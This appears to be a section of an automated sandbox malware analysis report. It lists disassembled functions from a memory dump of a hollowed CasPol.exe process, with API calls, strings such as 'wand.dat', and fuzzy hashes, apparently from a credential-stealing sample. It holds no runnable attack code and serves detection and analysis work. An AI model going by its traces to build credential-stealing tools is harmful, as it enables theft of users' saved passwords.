                                                                                                                    APIs
                                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                    • String ID: General
                                                                                                                    • API String ID: 999786162-26480598
                                                                                                                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy
                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpymemset
                                                                                                                    • String ID: gj
                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@$free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2241099983-0
                                                                                                                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                    APIs
                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4053608372-0
                                                                                                                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4247780290-0
                                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1471605966-0
                                                                                                                    • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                    • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                    APIs
                                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                    • API String ID: 102104167-2245444037
                                                                                                                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                    APIs
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 613200358-0
                                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                    • String ID: </%s>
                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                    • String ID: caption
                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                    • String ID: MS Sans Serif
                                                                                                                    • API String ID: 210187428-168460110
                                                                                                                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                    APIs
                                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3384217055-0
                                                                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                                    • API String ID: 2618321458-1828844352
                                                                                                                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3550944819-0
                                                                                                                    • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                    • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                    APIs
                                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$free
                                                                                                                    • String ID: g4@
                                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                                    • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                    • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                    APIs
                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1127616056-0
                                                                                                                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                    APIs
